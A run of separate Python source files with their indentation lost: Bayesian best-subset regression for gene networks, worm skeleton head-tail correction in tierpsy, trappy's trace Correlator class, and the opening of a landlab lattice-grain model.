np.fill_diagonal(subset,False)
pp=pp.set_value(preds, preds, subset)
out_list=[]
global gx, gy, gpp, gwm, gns
gx, gy, gpp, gwm, gns = X, Y, pp, weights_mat, nS
# Here we illustrate splitting a simple loop, but the same approach
# would work with any iterative control structure, as long as it is
# deterministic.
s = []
limit = G
for j in range(limit):
if next(ownCheck):
s.append(BBSRforOneGeneWrapper(j))
# Report partial result.
kvs.put('plist',(rank,s))
# One participant gathers the partial results and generates the final
# output.
if 0 == rank:
s=[]
workers=int(os.environ['SLURM_NTASKS'])
for p in range(workers):
wrank,ps = kvs.get('plist')
s.extend(ps)
print ('final s', len(s))
utils.kvsTearDown(kvs, rank)
return s
else:
return None
def BBSRforOneGene(ind, X, Y, pp, weights_mat, nS):
if ind % 100 == 0:
print('Progress: computing BBSR for gene {}'.format(ind))
pp_i = pp.ix[ind,].values # converted to numpy array
pp_i_index = [l for l, j in enumerate(pp_i) if j]
if sum(pp_i) == 0:
return dict(ind=ind,pp=np.repeat(True, len(pp_i)).tolist(),betas=0, betas_resc=0)
# create BestSubsetRegression input
y = Y.ix[ind,:][:, np.newaxis]
x = X.ix[pp_i_index,:].transpose().values # converted to numpy array
g = np.matrix(weights_mat.ix[ind,pp_i_index],dtype=np.float)
# experimental stuff
spp = ReduceNumberOfPredictors(y, x, g, nS)
#check again
pp_i[pp_i==True] = spp # this could cause issues if they aren't the same length
pp_i_index = [l for l, j in enumerate(pp_i) if j]
x = X.ix[pp_i_index,:].transpose().values # converted to numpy array
g = np.matrix(weights_mat.ix[ind,pp_i_index],dtype=np.float)
betas = BestSubsetRegression(y, x, g)
betas_resc = PredictErrorReduction(y, x, betas)
return (dict(ind=ind, pp=pp_i, betas=betas, betas_resc=betas_resc))
def ReduceNumberOfPredictors(y, x, g, n):
K = x.shape[1] #what is the maximum size of K, print K
spp = None
if K <= n:
spp = np.repeat(True, K).tolist()
return spp
combos = np.hstack((np.diag(np.repeat(True,K)),CombCols(K)))
bics = ExpBICforAllCombos(y, x, g, combos)
bics_sum = np.sum(np.multiply(combos.transpose(),bics[:, np.newaxis]).transpose(),1)
bics_sum = list(bics_sum)
ret = np.repeat(False, K)
ret[np.argsort(bics_sum)[0:n]] = True
return ret
def BestSubsetRegression(y, x, g):
# Do best subset regression by using all possible combinations of columns of
#x as predictors of y. Model selection criterion is BIC using results of
# Bayesian regression with Zellner's g-prior.
# Args:
# y: dependent variable
# x: independent variable
# g: value for Zellner's g-prior; can be single value or vector
# Returns:
# Beta vector of best mode
K = x.shape[1]
N = x.shape[0]
ret = []
combos = AllCombinations(K)
bics = ExpBICforAllCombos(y, x, g, combos)
not_done = True
while not_done:
best = np.argmin(bics)
betas = np.repeat(0.0,K)
if best > 0:
lst_combos_bool=combos[:, best]
lst_true_index = [i for i, j in enumerate(lst_combos_bool) if j]
x_tmp = x[:,lst_true_index]
bhat = np.linalg.solve(np.dot(x_tmp.transpose(),x_tmp),np.dot(x_tmp.transpose(),y))
for m in range(len(lst_true_index)):
ind_t=lst_true_index[m]
betas[ind_t]=bhat[m]
not_done = False
else:
not_done = False
return betas
def AllCombinations(k):
# Create a boolean matrix with all possible combinations of 1:k. Output has k rows and 2^k columns where each column is one combination.
# Note that the first column is all FALSE and corresponds to the null model.
if k < 1:
raise ValueError("No combinations for k < 1")
lst = map(list, itertools.product([False, True], repeat=k))
out=np.array([i for i in lst]).transpose()
return out
# Get all possible pairs of K predictors
def CombCols(K):
num_pair = K*(K-1)/2
a = np.full((num_pair,K), False, dtype=bool)
b = list(list(tup) for tup in itertools.combinations(range(K), 2))
for i in range(len(b)):
a[i,b[i]]=True
c = a.transpose()
return c
def ExpBICforAllCombos(y, x, g, combos):
# For a list of combinations of predictors do Bayesian linear regression, more specifically calculate the parametrization of the inverse gamma
# distribution that underlies sigma squared using Zellner's g-prior method.
# Parameter g can be a vector. The expected value of the log of sigma squared is used to compute expected values of BIC.
# Returns list of expected BIC values, one for each model.
K = x.shape[1]
N = x.shape[0]
C = combos.shape[1]
bics = np.array(np.repeat(0,C),dtype=np.float)
# is the first combination the null model?
first_combo = 0
if sum(combos[:,0]) == 0:
bics[0] = N * math.log(np.var(y,ddof=1))
first_combo = 1
# shape parameter for the inverse gamma sigma squared would be drawn from
shape = N / 2
# compute digamma of shape here, so we can re-use it later
dig_shape = special.digamma(shape)
#### pre-compute the dot products that we will need to solve for beta
xtx = np.dot(x.transpose(),x)
xty = np.dot(x.transpose(),y)
# In Zellner's formulation there is a factor in the calculation of the rate parameter: 1 / (g + 1)
# Here we replace the factor with the approriate matrix since g is a vector now.
var_mult = np.array(np.repeat(np.sqrt(1 / (g + 1)), K,axis=0)).transpose()
var_mult = np.multiply(var_mult,var_mult.transpose())
for i in range(first_combo, C):
comb = combos[:, i]
comb=np.where(comb)[0]
x_tmp = x[:,comb]
k = len(comb)
xtx_tmp=xtx[:,comb][comb,:]
# if the xtx_tmp matrix is singular, set bic to infinity
if np.linalg.matrix_rank(xtx_tmp, tol=1e-10) == xtx_tmp.shape[1]:
var_mult_tmp=var_mult[:,comb][comb,:]
#faster than calling lm
bhat = np.linalg.solve(xtx_tmp,xty[comb])
ssr = np.sum(np.power(np.subtract(y,np.dot(x_tmp, bhat)),2)) # sum of squares of residuals
# rate parameter for the inverse gamma sigma squared would be drawn from our guess on the regression vector beta is all 0 for sparse models
rate = (ssr + np.dot((0 - bhat.transpose()) , np.dot(np.multiply(xtx_tmp, var_mult_tmp) ,(0 - bhat.transpose()).transpose()))) / 2
# the expected value of the log of sigma squared based on the parametrization of the inverse gamma by rate and shape
exp_log_sigma2 = math.log(rate) - dig_shape
# expected value of BIC
bics[i] = N * exp_log_sigma2 + k * math.log(N)
# set bic to infinity if lin alg error
else:
bics[i] = np.inf
return(bics)
def PredictErrorReduction(y, x, beta):
# Calculates the error reduction (measured by variance of residuals) of each
# predictor - compare full model to model without that predictor
N = x.shape[0]
K = x.shape[1]
pred = [True if item!=0 else False for item in beta]
pred_index = [l for l, j in enumerate(pred) if j]
P = sum(pred)
# compute sigma^2 for full model
residuals = np.subtract(y,np.dot(x,beta)[:, np.newaxis])
sigma_sq_full = np.var(residuals,ddof=1)
# this will be the output
err_red = np.repeat(0.0,K)
# special case if there is only one predictor
if P == 1:
err_red[pred_index] = 1 - (sigma_sq_full/np.var(y,ddof=1))
# one by one leave out each predictor and re-compute the model with the remaining ones
for i in pred_index[0:K]:
pred_tmp = pred[:]
pred_tmp[i] = False
pred_tmp_index= [l for l, j in enumerate(pred_tmp) if j]
x_tmp = x[:,pred_tmp_index]
bhat = np.linalg.solve(np.dot(x_tmp.transpose(),x_tmp),np.dot(x_tmp.transpose(),y))
residuals = np.subtract(y,np.dot(x_tmp,bhat))
sigma_sq = np.var(residuals,ddof=1)
err_red[i] = 1 - (sigma_sq_full / sigma_sq)
return err_red
class BBSR_runner:
def run(self, X, Y, clr, prior_mat, kvs=None, rank=0, ownCheck=None):
n = 10
no_prior_weight = 1
prior_weight = 1 # prior weight has to be larger than 1 to have an effect
weights_mat = prior_mat * 0 + no_prior_weight
weights_mat = weights_mat.mask(prior_mat != 0, other=prior_weight)
run_result = BBSR(X, Y, clr, n, no_prior_weight, weights_mat, prior_mat, kvs, rank, ownCheck)
if rank:
return (None,None)
bs_betas = pd.DataFrame(np.zeros((Y.shape[0],prior_mat.shape[1])),index=Y.index,columns=prior_mat.columns)
bs_betas_resc = bs_betas.copy(deep=True)
for res in run_result:
bs_betas.ix[res['ind'],X.index.values[res['pp']]] = res['betas']
bs_betas_resc.ix[res['ind'],X.index.values[res['pp']]] = res['betas_resc']
return (bs_betas, bs_betas_resc)
|
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 13 19:00:43 2016
@author: ajaver
"""
import collections
import os
import numpy as np
import pandas as pd
import tables
from scipy.ndimage.filters import median_filter, minimum_filter, maximum_filter
from tierpsy.analysis.int_ske_orient.checkFinalOrientation import checkFinalOrientation
from tierpsy.helper.params import head_tail_defaults, head_tail_int_defaults
from tierpsy.helper.misc import TimeCounter, print_flush
def medabsdev(x): return np.median(np.abs(np.median(x) - x))
def createBlocks(flags_vector, min_block_size=0):
# divide data into groups of continous indexes
prev_ind = False
group_ini = []
group_fin = []
for ii, flag_ind in enumerate(flags_vector):
if not prev_ind and flag_ind:
group_ini.append(ii)
if prev_ind and not flag_ind:
# substract one size this is the condition one after the end of the
# block
group_fin.append(ii - 1)
prev_ind = flag_ind
# append the last index if the group ended in the last index
if len(group_ini) - len(group_fin) == 1:
group_fin.append(ii)
assert len(group_ini) == len(group_fin)
# change this into a single list of tuples
groups = list(zip(group_ini, group_fin))
# remove any group smaller than the min_block_size
groups = [gg for gg in groups if gg[1] - gg[0] >= min_block_size]
return groups
def _fuseOverlapingGroups(corr_groups, gap_size=0):
'''Helper function of correctBlock.
-- gap_size, gap between blocks
'''
# ensure the groups are sorted
corr_groups = sorted(corr_groups)
if len(corr_groups) == 1:
return corr_groups
else:
# fuse groups that overlap
ini, fin = corr_groups[0]
corr_groups_f = [] # [(ini,fin)]
for gg in corr_groups[1:]:
if fin + gap_size >= gg[0]:
fin = gg[1]
else:
corr_groups_f.append((ini, fin))
ini, fin = gg
corr_groups_f.append((ini, fin))
return corr_groups_f
def correctBlock(groups, new_flag_vec, gap_size=0):
if len(groups) == 0:
return groups # nothing to do here
corr_groups = []
maxInd = len(new_flag_vec) - 1
for gg in groups:
# loop until it reaches the window borders or find an false index
ini = gg[0]
while ini > 0: # and ini > gg[0]-smooth_W:
if not new_flag_vec[ini - 1]:
break
ini -= 1
fin = gg[1]
# print('a',fin)
while fin < maxInd: # and fin < gg[1]+smooth_W:
if not new_flag_vec[fin + 1]:
break
fin += 1
# print('b',fin)
corr_groups.append((ini, fin))
assert len(groups) == len(corr_groups)
return _fuseOverlapingGroups(corr_groups, gap_size=gap_size)
def checkLocalVariation(worm_int_profile, groups, local_avg_win=10):
corr_groups = []
groups = sorted(groups)
tot_groups = len(groups)
max_index = len(groups) - 1
min_loc_avg_win = max(1, local_avg_win // 2)
for ii in range(tot_groups):
gg = groups[ii]
# get the limits from the previous and enxt index
prev_group = (-1, -1) if ii == 0 else groups[ii - 1]
next_group = (
tot_groups,
tot_groups) if ii == max_index else groups[
ii + 1]
med_block = np.median(worm_int_profile[gg[0]:gg[1] + 1], axis=0)
m_dif_ori_left = 0
m_dif_inv_left = 0
m_dif_ori_right = 0
m_dif_inv_right = 0
# get previous contigous map limits
bot = max(gg[0] - local_avg_win, prev_group[1] + 1)
top = gg[0] - 1
if top - bot + 1 >= min_loc_avg_win:
med_block_left = np.median(worm_int_profile[bot:top + 1], axis=0)
m_dif_ori_left = np.sum(np.abs(med_block - med_block_left))
m_dif_inv_left = np.sum(np.abs(med_block - med_block_left[::-1]))
# get next contigous map limits
bot = gg[1] + 1
top = min(gg[1] + local_avg_win, next_group[0] - 1)
if top - bot + 1 >= min_loc_avg_win:
#med_block = np.median(worm_avg[min(gg[1]-local_avg_win, gg[0]):gg[1]+1], axis=0)
med_block_right = np.median(worm_int_profile[bot:top + 1], axis=0)
m_dif_ori_right = np.sum(np.abs(med_block - med_block_right))
m_dif_inv_right = np.sum(np.abs(med_block - med_block_right[::-1]))
# combine both, we only need to have a size that show a very big change when the intensity map is switch
# if m_dif_inv_left+m_dif_inv_right < m_dif_ori_left+m_dif_ori_right:
if m_dif_inv_left <= m_dif_ori_left and m_dif_inv_right <= m_dif_ori_right:
corr_groups.append(gg)
return corr_groups
def removeBadSkelBlocks(
groups,
int_skeleton_id,
trajectories_worm,
min_frac_in,
gap_size):
if len(groups) == 0:
return groups # nothing to do here
assert trajectories_worm['worm_index_joined'].unique().size == 1
# get the index of the skeletons that delimited the candiate block to be
# inverted
skel_group = [(int_skeleton_id[ini], int_skeleton_id[fin])
for ini, fin in groups]
# change index in the original worm skeletons matrix
first_skel = trajectories_worm.index[0]
int_skel_group = [(x - first_skel, y - first_skel) for x, y in skel_group]
# create globs according if consecutive frames have an skeleton map (if
# the have valid filtered skeletons)
good = (trajectories_worm['int_map_id'] != -1).values
has_skel_group = createBlocks(good, min_block_size=0)
# get the gaps location before fussing groups, otherwise we will over
# estimate the size of the groups
is_gap = np.full(len(trajectories_worm), True, np.bool)
for kk, gg in enumerate(has_skel_group):
is_gap[gg[0]:gg[1] + 1] = False
# fuse skeletons blocks to be more stringent with the selection
has_skel_group = _fuseOverlapingGroups(has_skel_group, gap_size=gap_size)
# to test for overlaps let's created a vector with the labeled groups
has_blocks_flags = np.full(len(trajectories_worm), -1, np.int)
for kk, gg in enumerate(has_skel_group):
has_blocks_flags[gg[0]:gg[1] + 1] = kk
# remove labels from the gaps
has_blocks_flags[is_gap] = -1
# total number of skeletons for each group
blocks_sizes = collections.Counter(has_blocks_flags)
# total number of skeletons of a given group inside a block to be switched
blocks_in = []
for gg in int_skel_group:
blocks_in += list(has_blocks_flags[gg[0]:gg[1] + 1])
blocks_in_size = collections.Counter(blocks_in)
# calculate the fraction of skeletons of each group insde a block
blocks_in_frac = {x: (blocks_in_size[x] / blocks_sizes[x])
for x in blocks_in_size if x != -1}
# only keep groups that has at least blocks_in_frac skeletons inside the
# block
corr_skel_group = [has_skel_group[x]
for x in blocks_in_frac if blocks_in_frac[x] >= min_frac_in]
# shift the index to match the general trajectories_table
corr_skel_group = [(x + first_skel, y + first_skel)
for x, y in corr_skel_group]
# convert from skeleton row id in the worm profile_intensities
int_map_ord = {dd: kk for kk, dd in enumerate(int_skeleton_id)}
corr_groups = [(int_map_ord[x], int_map_ord[y])
for x, y in corr_skel_group]
# correct for contingous groups
if len(corr_groups) > 1:
corr_groups = _fuseOverlapingGroups(corr_groups, gap_size=1)
return corr_groups
def dat_switch(X, r_range):
fin = r_range[1] + 1
dat = X[r_range[0]:fin]
X[r_range[0]:fin] = dat[:, ::-1]
def dat_swap(X, Y, r_range):
fin = r_range[1] + 1
dat_x = X[r_range[0]:fin]
dat_y = Y[r_range[0]:fin]
X[r_range[0]:fin] = dat_y
Y[r_range[0]:fin] = dat_x
def dat_switch_swap(X, Y, r_range):
fin = r_range[1] + 1
dat_x = X[r_range[0]:fin]
dat_y = Y[r_range[0]:fin]
X[r_range[0]:fin] = dat_y[:, ::-1]
Y[r_range[0]:fin] = dat_x[:, ::-1]
def switchBlocks(skel_group, skeletons_file, int_group, intensities_file):
with tables.File(skeletons_file, 'r+') as fid:
contour_side1 = fid.get_node('/contour_side1')
contour_side2 = fid.get_node('/contour_side2')
skeleton = fid.get_node('/skeleton')
contour_width = fid.get_node('/contour_width')
#cnt1_length = fid.get_node('/contour_side1_length')
#cnt2_length = fid.get_node('/contour_side2_length')
# w_head_t = fid.get_node('/width_head_tip')
# w_head_b = fid.get_node('/width_head_base')
# w_neck = fid.get_node('/width_neck')
# w_hips = fid.get_node('/width_hips')
# w_tail_b = fid.get_node('/width_tail_base')
# w_tail_t = fid.get_node('/width_tail_tip')
for gg in skel_group:
dat_switch_swap(contour_side1, contour_side2, gg)
dat_switch(skeleton, gg)
dat_switch(contour_width, gg)
#dat_swap(cnt1_length, cnt2_length, gg)
#dat_swap(w_head_t, w_tail_t, gg)
#dat_swap(w_head_b, w_tail_b, gg)
#dat_swap(w_hips, w_neck, gg)
fid.flush()
with tables.File(intensities_file, 'r+') as fid:
worm_int_med = fid.get_node('/straighten_worm_intensity_median')
for gg in int_group:
dat_switch(worm_int_med, gg)
if '/straighten_worm_intensity' in fid:
worm_int = fid.get_node('/straighten_worm_intensity')
for ini, fin in int_group:
dat = worm_int[ini:fin + 1, :, :]
worm_int[ini:fin + 1, :, :] = dat[:, ::-1, ::-1]
fid.flush()
def getDampFactor(length_resampling):
# this is small window that reduce the values on the head a tail, where a
# segmentation error or noise can have a very big effect
MM = length_resampling // 4
rr = (np.arange(MM) / (MM - 1)) * 0.9 + 0.1
damp_factor = np.ones(length_resampling)
damp_factor[:MM] = rr
damp_factor[-MM:] = rr[::-1]
return damp_factor
def correctHeadTailIntWorm(
trajectories_worm,
skeletons_file,
intensities_file,
smooth_W=5,
gap_size=0,
min_block_size=10,
local_avg_win=25,
min_frac_in=0.85,
method='MEDIAN_INT'):
# get data with valid intensity maps (worm int profile)
good = trajectories_worm['int_map_id'] != -1
int_map_id = trajectories_worm.loc[good, 'int_map_id'].values
int_skeleton_id = trajectories_worm.loc[good, 'skeleton_id'].values
int_frame_number = trajectories_worm.loc[good, 'frame_number'].values
# only analyze data that contains at least min_block_size intensity
# profiles
if int_map_id.size == 0 or int_map_id.size < min_block_size:
return []
# read the worm intensity profiles
with tables.File(intensities_file, 'r') as fid:
worm_int_profile = fid.get_node(
'/straighten_worm_intensity_median')[int_map_id, :]
# normalize intensities of each individual profile
worm_int_profile -= np.median(worm_int_profile, axis=1)[:, np.newaxis]
# reduce the importance of the head and tail. This parts are typically
# more noisy
damp_factor = getDampFactor(worm_int_profile.shape[1])
worm_int_profile *= damp_factor
if method == 'HEAD_BRIGHTER':
segmentIndex = worm_int_profile.shape[1]//5
top_part = worm_int_profile[:,1:segmentIndex].astype(np.float)
bot_part = worm_int_profile[:,-segmentIndex:].astype(np.float)
# get the difference between the max of the first part and the min of the last part of skeleton
#diff_ori = np.abs(np.median(top_part, axis=1) - np.min(bot_part, axis=1)) # diff_inv should be high when the orientation is correct
#diff_inv = np.abs(np.min(top_part, axis=1) - np.max(bot_part, axis=1)) # diff_ori should be high when the orientation is incorrect
diff_inv = np.median(top_part, axis=1) - np.median(bot_part, axis=1) #diff_inv should be high when the orientation is correct
diff_ori = 0
else: # default method is 'MEDIAN_INT'
# worm median intensity
med_int = np.median(worm_int_profile, axis=0).astype(np.float)
# let's check for head tail errors by comparing the
# total absolute difference between profiles using the original
# orientation ...
diff_ori = np.sum(np.abs(med_int - worm_int_profile), axis=1)
#... and inverting the orientation
diff_inv = np.sum(np.abs(med_int[::-1] - worm_int_profile), axis=1)
#%%
# smooth data, it is easier for identification
diff_ori_med = median_filter(diff_ori, smooth_W)
diff_inv_med = median_filter(diff_inv, smooth_W)
# this will increase the distance between the original and the inversion.
# Therefore it will become more stringent on detection
diff_orim = minimum_filter(diff_ori_med, smooth_W)
diff_invM = maximum_filter(diff_inv_med, smooth_W)
# a segment with a bad head-tail indentification should have a lower
# difference with the median when the profile is inverted.
bad_orientationM = diff_orim > diff_invM
if np.all(bad_orientationM) and method != 'HEAD_BRIGHTER':
return []
# let's create blocks of skeletons with a bad orientation
blocks2correct = createBlocks(bad_orientationM, min_block_size)
# print(blocks2correct)
# let's refine blocks limits using the original unsmoothed differences
bad_orientation = diff_ori > diff_inv
blocks2correct = correctBlock(blocks2correct, bad_orientation, gap_size=0)
# let's correct the blocks inversion boundaries by checking that they do not
# travers a group of contigous skeletons. I am assuming that head tail errors
# only can occur when we miss an skeleton.
blocks2correct = removeBadSkelBlocks(
blocks2correct,
int_skeleton_id,
trajectories_worm,
min_frac_in,
gap_size=gap_size)
# Check in the boundaries between blocks if there is really a better local
# match if the block is inverted
blocks2correct = checkLocalVariation(
worm_int_profile, blocks2correct, local_avg_win)
if not blocks2correct:
return []
# redefine the limits in the skeleton_file and intensity_file rows using
# the final blocks boundaries
skel_group = [(int_skeleton_id[ini], int_skeleton_id[fin])
for ini, fin in blocks2correct]
int_group = [(int_map_id[ini], int_map_id[fin])
for ini, fin in blocks2correct]
# finally switch all the data to correct for the wrong orientation in each
# group
switchBlocks(skel_group, skeletons_file, int_group, intensities_file)
# store data from the groups that were switched
switched_blocks = []
for ini, fin in blocks2correct:
switched_blocks.append((int_frame_number[ini], int_frame_number[fin]))
return switched_blocks
def correctHeadTailIntensity(
skeletons_file,
intensities_file,
smooth_W=5,
gap_size=-1,
min_block_size=-1,
local_avg_win=-1,
min_frac_in=0.85,
head_tail_param={},
head_tail_int_method='MEDIAN_INT'):
output = head_tail_int_defaults(skeletons_file,
smooth_W=smooth_W,
gap_size = gap_size,
min_block_size = min_block_size,
local_avg_win = local_avg_win)
smooth_W = output['smooth_W']
gap_size = output['gap_size']
min_block_size = output['min_block_size']
local_avg_win = output['local_avg_win']
head_tail_param = head_tail_defaults(skeletons_file, **head_tail_param)
# get the trajectories table
with pd.HDFStore(skeletons_file, 'r') as fid:
trajectories_data = fid['/trajectories_data']
# at this point the int_map_id with the intensity maps indexes must
# exist in the table
assert 'int_map_id' in trajectories_data
grouped_trajectories = trajectories_data.groupby('worm_index_joined')
tot_worms = len(grouped_trajectories)
# variables to report progress
base_name = skeletons_file.rpartition(
'.')[0].rpartition(os.sep)[-1].rpartition('_')[0]
progress_timer = TimeCounter('')
bad_worms = [] # worms with not enough difference between the normal and inverted median intensity profile
switched_blocks = [] # data from the blocks that were switched
#ind2check = [765]
for index_n, (worm_index, trajectories_worm) in enumerate(
grouped_trajectories):
# if not worm_index in ind2check: continue
if index_n % 10 == 0:
dd = " Correcting Head-Tail using intensity profiles. Worm %i of %i." % (
index_n + 1, tot_worms)
dd = base_name + dd + ' Total time:' + progress_timer.get_time_str()
print_flush(dd)
# correct head tail using the intensity profiles
dd = correctHeadTailIntWorm(
trajectories_worm,
skeletons_file,
intensities_file,
smooth_W,
gap_size,
min_block_size,
local_avg_win,
min_frac_in,
head_tail_int_method)
switched_blocks += [(worm_index, t0, tf) for t0, tf in dd]
# check that the final orientation is correct, otherwise switch the
# whole trajectory
if head_tail_int_method != 'HEAD_BRIGHTER':
p_tot, skel_group, int_group = checkFinalOrientation(
skeletons_file,
intensities_file,
trajectories_worm,
min_block_size,
head_tail_param)
if p_tot < 0.5:
switchBlocks(
skel_group,
skeletons_file,
int_group,
intensities_file)
# label the process as finished and store the indexes of the switched worms
with tables.File(skeletons_file, 'r+') as fid:
if not '/intensity_analysis' in fid:
fid.create_group('/', 'intensity_analysis')
if '/intensity_analysis/bad_worms' in fid:
fid.remove_node('/intensity_analysis/min_block_size/bad_worms')
if '/intensity_analysis/switched_head_tail' in fid:
fid.remove_node('/intensity_analysis/switched_head_tail')
if bad_worms:
fid.create_array(
'/intensity_analysis',
'bad_worms',
np.array(bad_worms))
if switched_blocks:
# to rec array
switched_blocks = np.array(
switched_blocks, dtype=[
('worm_index', np.int), ('ini_frame', np.int), ('last_frame', np.int)])
fid.create_table(
'/intensity_analysis',
'switched_head_tail',
switched_blocks)
fid.get_node('/skeleton')._v_attrs['has_finished'] = 4
print_flush(
base_name +
' Head-Tail correction using intensity profiles finished: ' +
progress_timer.get_time_str())
# return bad_worms, switched_blocks
if __name__ == '__main__':
#%%
#masked_image_file = '/Users/ajaver/Desktop/Videos/Avelino_17112015/MaskedVideos/CSTCTest_Ch1_18112015_075624.hdf5'
#masked_image_file = '/Users/ajaver/Desktop/Videos/Avelino_17112015/MaskedVideos/CSTCTest_Ch1_17112015_205616.hdf5'
#masked_image_file = '/Users/ajaver/Desktop/Videos/04-03-11/MaskedVideos/575 JU440 swimming_2011_03_04__13_16_37__8.hdf5'
#masked_image_file = '/Users/ajaver/Desktop/Videos/04-03-11/MaskedVideos/575 JU440 on food Rz_2011_03_04__12_55_53__7.hdf5'
masked_image_file = '/Volumes/behavgenom$/GeckoVideo/Curro/MaskedVideos/exp2/Pos2_Ch2_28012016_182629.hdf5'
skeletons_file = masked_image_file.replace('MaskedVideos', 'Results')[
:-5] + '_skeletons.hdf5'
intensities_file = skeletons_file.replace('_skeletons', '_intensities')
correctHeadTailIntensity(
skeletons_file,
intensities_file,
smooth_W=5,
gap_size=0,
min_block_size=10,
local_avg_win=25,
min_frac_in=0.95,
head_tail_int_method='MEDIAN_INT')
|
|
# Copyright 2015-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""The module responsible for correlation
and related functionality
"""
from trappy.plotter.PlotLayout import PlotLayout
from trappy.stats import StatConf
from trappy.stats.Indexer import get_unified_indexer
import numpy as np
import math
class Correlator(object):
"""Class that allows to align and correlate two
runs
"""
def __init__(self, first, second, **kwargs):
"""
Args:
first (stat.Aggregator): First Aggregator
second (stat.Aggregator): Second Aggregator
"""
self._first_agg = first
self._second_agg = second
self.indexer = get_unified_indexer([first.indexer, second.indexer])
self._corrfunc = kwargs.pop("corrfunc", None)
self._agg_kwargs = kwargs
self.corr_graphs = {}
self._shift = self._align_top_level()
def _resample(self, series, delta=StatConf.DELTA_DEFAULT):
"""Internal method to resample the series
to a uniformally spaces index
Args:
series (pandas.Series): Series io be resampled
delta (float): spacing between indices
Returns:
resampled (pandas.Series)
"""
new_index = self.indexer.get_uniform(delta)
return series.reindex(index=new_index, method="pad")
def correlate(self, level, resample=True):
"""This function returns the correlation between two
runs
Args:
level: The level at which the correlation is
required
Returns:
A normalized correlation value is returned
for each group in the level
"""
result_1 = self._first_agg.aggregate(level=level, **self._agg_kwargs)
result_2 = self._second_agg.aggregate(level=level, **self._agg_kwargs)
corr_output = []
weights = []
for group_id, result_group in enumerate(result_1):
series_x = result_group
series_y = result_2[group_id]
if resample:
series_x = self._resample(series_x)
series_y = self._resample(series_y)
series_x, series_y = shift_series(series_x, series_y, self._shift)
corr_output.append(self._correlate(series_x, series_y))
weights.append(len(series_x[series_x != 0]) + len(series_y[series_y != 0]))
total = 0
for weight, corr in zip(weights, corr_output):
if math.isnan(corr):
continue
total += (weight * corr) / sum(weights)
return corr_output, total
def plot(self, level, per_line=3):
"""Temporary function to plot data. Expected to be
implemented in plotter
"""
num_plots = self._first_agg.topology.level_span(level)
result_1 = self._first_agg.aggregate(level=level, **self._agg_kwargs)
result_2 = self._second_agg.aggregate(level=level, **self._agg_kwargs)
layout = PlotLayout(per_line, num_plots)
plot_index = 0
for group_id, result_group in enumerate(result_1):
s_x = result_group
s_y = result_2[group_id]
s_x = self._resample(s_x)
s_y = self._resample(s_y)
s_x, s_y = shift_series(s_x, s_y, self._shift)
ymax = 1.25 + max(max(s_x.values), max(s_y.values)) + 1
ymin = min(min(s_x.values), min(s_y.values)) - 1
ylim = [ymin, ymax]
ylim = [-1, 3]
axis = layout.get_axis(plot_index)
axis.plot(s_x.index, s_x.values)
axis.plot(s_y.index, s_y.values)
axis.set_ylim(ylim)
plot_index += 1
layout.finish(plot_index)
def _correlate(self, s_x, s_y):
if self._corrfunc != None:
f = self._corrfunc
return f(s_x, s_y)
else:
return s_x.corr(s_y)
def _align_top_level(self):
"""Temporary function to plot data. Expected to be
implemented in plotter
"""
result_1 = self._first_agg.aggregate(level="all")
result_2 = self._second_agg.aggregate(level="all")
s_x = self._resample(result_1[0])
s_y = self._resample(result_2[0])
front_x, front_y, front_shift = align(s_x, s_y, mode="front")
front_corr = self._correlate(front_x, front_y)
back_x, back_y, back_shift = align(s_x, s_y, mode="back")
back_corr = self._correlate(back_x, back_y)
if math.isnan(back_corr):
back_corr = 0
if math.isnan(front_corr):
front_corr = 0
if front_corr >= back_corr:
return front_shift
else:
return back_shift
def align(s_x, s_y, mode="front"):
"""Function to align the input series"""
p_x = np.flatnonzero(s_x)
p_y = np.flatnonzero(s_y)
if not len(p_x) or not len(p_y):
return s_x, s_y, 0
if mode == "front":
p_x = p_x[0]
p_y = p_y[0]
if mode == "back":
p_x = p_x[-1]
p_y = p_y[-1]
shift = p_x - p_y
s_x, s_y = shift_series(s_x, s_y, shift)
return s_x, s_y, shift
def shift_series(s_x, s_y, shift):
if shift > 0:
s_y = s_y.shift(shift)
else:
s_x = s_x.shift(-1 * shift)
return s_x, s_y
|
|
# -*- coding: utf-8 -*-
"""
Provide rules and states for a lattice-grain CTS model.
Created on Tue Feb 2 07:37:59 2016
@author: gtucker
"""
from landlab.ca.celllab_cts import Transition
def lattice_grain_node_states():
"""
Create and return dict of states for lattice-grain model.
Examples
--------
>>> nsd = lattice_grain_node_states()
>>> len(nsd)
9
"""
ns_dict = {
0: "empty",
1: "moving up",
2: "moving right and up",
3: "moving right and down",
4: "moving down",
5: "moving left and down",
6: "moving left and up",
7: "rest",
8: "wall",
}
return ns_dict
def lattice_grain_transition_list(g=0.0, f=0.0, motion=1.0, swap=False, callback=None):
"""
Creates and returns a list of Transition() objects to represent state
transitions for simple granular mechanics model.
Parameters
----------
g : float (optional)
Gravitational parameter. 1/g is the time taken for an initially
stationary particle to fall one cell width. (Dimensions of 1/time)
f : float (optional)
Frictional parameter. Dimensions of 1/time. Probability per unit time
of a frictional collision, in which one or both colliding particles
come to a halt.
motion : float (optional)
Rate of motion (cells per time unit)
swap : bool (optional)
Whether to swap properties for motion transition; set to True if you
want to track grain position via the 'propid' array.
callback : function (optional)
Function to be called after each transition. Used to implement custom
handling of properties that evolve over time at each cell.
Returns
-------
xn_list : list of Transition objects
List of objects that encode information about the link-state transitions.
Notes
-----
The transitions for this version of lattice gas have 11 pair-transition
rules. The shorthand for the states is as follows:
AR = air/empty
IN = incoming particle (moving toward its neighbor)
OU = outgoing particle (moving away from its neighbor)
IO = incoming at an oblique angle
OO = outgoing at an oblique angle
RE = rest particle
WA = wall particle
op = oblique pair moving in opposite perpendicular direction
sm = oblique pair moving in same perpendicular direction
The 11 pairs with transitions are:
1. AR-IN => IN-AR (move to empty particle)
2. IN-IN => OO-OO-op (1/3 each dir), OU-OU (1/3) (head-on collision)
3. IN-IO => OO-OU (oblique collision)
4. IN-OO => IO-OU (oblique collision from behind)
5. IN-OU => IO-OO (1/4 each of 2 directions) (collision from behind)
6. IN-RE => RE-OU (1/3) RE-OO (1/3 each dir) (collision with rest)
7. IN-WA => OU-WA (1/3) OO-WA (1/3 each dir) (wall collision)
